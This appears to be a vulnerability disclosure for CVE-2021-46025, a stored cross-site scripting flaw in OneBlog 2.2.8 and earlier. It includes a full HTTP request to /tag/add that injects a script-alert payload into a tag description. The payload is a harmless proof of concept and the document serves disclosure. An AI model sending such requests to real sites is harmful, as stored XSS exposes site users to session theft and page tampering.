Headline
CVE-2021-46025: There is a stored xss vulnerability exists in OneBlog- <=2.2.8 · Issue #27 · zhangyd-c/OneBlog
A Cross SIte Scripting (XSS) vulnerability exists in OneBlog <= 2.2.8. via the add function in the operation tab list in the background.
Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
Access the add function in the operation tab list in the background, and then inject
<script>alert(“xss”)</script>code
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
OneBlog- <=2.2.8
[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: “Chromium";v="91", " Not;A Brand";v="99”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close
id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote
[Impact Code execution]
true